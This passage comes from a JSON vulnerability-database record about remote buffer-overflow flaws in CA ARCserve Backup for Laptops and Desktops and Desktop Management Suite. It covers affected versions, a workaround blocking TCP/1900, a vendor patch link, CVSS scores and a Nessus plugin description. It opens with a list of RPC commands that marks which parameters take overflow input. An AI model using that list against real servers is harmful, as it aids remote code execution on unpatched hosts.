rxsGetBackupLog~~aa~~<overflow>~~40000\r\n rxsBackupComplete~~aa~~aa~~aa~~<overflow>~~aa\r\n rxsSetDataGrowthScheduleAndFilter~~aa~~aa~~aa~~aa~~<overflow>\r\n rxsSetDefaultConfigName~~<overflow>\r\n rxrSetMessageLogSettings~~65~~45~~79~~65~~<overflow>~~52~65~73~65~61~72~63~68~21\r\n\r\n\n\nComputer Associates Protection Suites r2\r\nComputer Associates ARCserve Backup (L&D) r4.0\r\nComputer Associates ARCserve Backup (L&D) r11.5\r\nComputer Associates ARCserve Backup (L&D) r11.1 SP2\r\nComputer Associates ARCserve Backup (L&D) r11.1 SP1\r\nComputer Associates ARCserve Backup (L&D) r11.1\r\nComputer Associates ARCserve Backup (L&D) r11.0\r\nComputer Associates Desktop Management Suite 11.2\r\nComputer Associates Desktop Management Suite 11.1\r\nComputer Associates Desktop Management Suite 11.0\n \u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u5728\u4e3b\u673a\u7981\u7528TCP/1900\u7aef\u53e3\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nComputer Associates\r\n-------------------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\n<a href=\"http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/caarcservebld-securitynotice.asp\" target=\"_blank\">http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/caarcservebld-securitynotice.asp</a>", "published": "2007-09-25T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.seebug.org/vuldb/ssvid-2247", "cvelist": ["CVE-2007-3216", "CVE-2007-5003", "CVE-2007-5004", "CVE-2007-5005", "CVE-2007-5006"], "lastseen": "2017-11-19T21:57:48"}], "nessus": [{"id": "CA_BABLD_LGSERVER_RCE1.NASL", "type": "nessus", "title": "CA ARCserve Backup for Laptops and Desktops Server and CA Desktop Management Suite Multiple Remote Vulnerabilities", "description": "According to the version of 
rxRPC.dll installed on the remote host, the Computer Associates product is affected by multiple vulnerabilities that could allow a remote attacker to execute arbitrary code on the host.", "published": "2013-08-13T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=69317", "cvelist": ["CVE-2007-5006", "CVE-2007-5005", "CVE-2008-1329", "CVE-2007-5003", "CVE-2008-1328", "CVE-2007-3216", "CVE-2007-5004"], "lastseen": "2017-10-29T13:46:13"}]}}